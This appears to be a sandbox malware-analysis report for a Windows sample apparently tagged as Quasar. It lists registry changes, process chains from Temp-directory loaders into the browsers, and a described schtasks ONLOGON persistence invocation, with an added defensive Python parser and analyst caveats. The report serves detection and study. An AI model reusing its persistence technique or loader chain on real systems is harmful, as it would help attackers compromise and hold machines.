Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Language = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\PackageCode = "D7076E96D3235814DB26ACC95D2BAD84" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\PackageName = "em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductIcon = "C:\\Windows\\Installer\\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\\icon.ico" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Version = "151109272" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductName = "Endpoint Manager Communication Client" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (24 identical rows collapsed)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (20 identical rows collapsed)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (20 identical rows collapsed)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3892 wrote to memory of 2144 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2144 wrote to memory of 4824 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe
PID 4824 wrote to memory of 4836 (2 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3076 (2 identical rows) N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4836 wrote to memory of 4644 (2 identical rows) N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4836 wrote to memory of 3136 (2 identical rows) N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3076 wrote to memory of 4004 (2 identical rows) N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4644 wrote to memory of 1020 (2 identical rows) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3136 wrote to memory of 5064 (11 identical rows) N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 (35 identical rows) N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
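An added example, not part of the sandbox report, that rebuilds the spawn chain from rows in the table above. A parent writing into a child it has just created is what CreateProcess looks like to a WriteProcessMemory hook, so rows like these are mostly process creation rather than injection; the signal is the ancestry, which places three binaries from the user's Temp directory (the sample, explorti.exe and 73b79a2459.exe) above cmd.exe and the three browsers. ROWS is a constructed subset of the table in the report's own layout and also accepts a row that carries an "(N identical rows)" count; the user-writable-path heuristic is my choice.

```python
"""Rebuild the spawn chain from 'wrote to memory of' rows.

Added example, not part of the sandbox report. ROWS is a constructed
subset of the WriteProcessMemory table above; a row may carry an
'(N identical rows)' count instead of being repeated.
"""
import re
from collections import Counter

ROWS = r"""
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2144 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe
PID 4824 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4836 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4836 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 (35 identical rows) N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
"""

# Report layout: Description Indicator Process Target (Indicator is always N/A here).
ROW = re.compile(
    r"^PID (\d+) wrote to memory of (\d+)(?: \((\d+) identical rows\))? N/A (.+?\.exe) (.+\.exe)$"
)
# Paths a standard user can write to; a writer living here is loader tier (my heuristic).
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)


def parse(text):
    """Return ({(writer_pid, target_pid): event_count}, {pid: image_path})."""
    edges, images = Counter(), {}
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        src, dst = int(m[1]), int(m[2])
        edges[(src, dst)] += int(m[3] or 1)
        images.setdefault(src, m[4])
        images.setdefault(dst, m[5])
    return edges, images


def parents(edges):
    """The first process seen writing into a PID is treated as its parent."""
    p = {}
    for src, dst in edges:
        p.setdefault(dst, src)
    return p


def chain(pid, edges, images):
    """Ancestry of pid from the root down, as (pid, image basename) pairs."""
    p = parents(edges)
    path = [pid]
    while path[-1] in p:
        path.append(p[path[-1]])
    return [(q, images[q].rsplit("\\", 1)[-1]) for q in reversed(path)]


def user_writable_writers(edges, images):
    """PIDs that wrote into another process while running from a user-writable path."""
    return sorted({src for src, _ in edges if USER_WRITABLE.search(images[src])})


if __name__ == "__main__":
    edges, images = parse(ROWS)
    for (src, dst), n in edges.items():
        print(f"{src} -> {dst}  x{n}")
    print(" > ".join(f"{pid}:{name}" for pid, name in chain(4940, edges, images)))
    print("loader tier:", user_writable_writers(edges, images))
```

Run stand-alone it prints the collapsed edge counts, the seven-process ancestry of the Firefox content process 4940, and the three loader-tier PIDs; the browser-to-browser rows are ordinary Chromium and Gecko child-process startup and drop out once the chain is read from the top.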

Uses Task Scheduler COM API

persistence

Note: the two schtasks.exe command lines in the Processes section below register an ONLOGON task named "svchost" that runs C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe with /rl HIGHEST /f. A "SubDir" install directory together with that exact schtasks invocation is the built-in startup routine of Quasar, one of the families tagged for this sample; the task name is the operator's configured value and has nothing to do with the real svchost.exe.

Uses Volume Shadow Copy service COM API

ransomware

Caveat: in this detonation vssvc.exe starts immediately after msiexec.exe in the Processes section, which is consistent with Windows Installer taking a System Restore snapshot while installing the COMODO Endpoint Manager MSI from AppData\Roaming. No vssadmin, wmic shadowcopy or similar deletion command line appears in the process list, so this signature on its own does not establish ransomware behaviour.

Processes

C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D997.tmp\D998.tmp\D999.bat C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa1279cc40,0x7ffa1279cc4c,0x7ffa1279cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

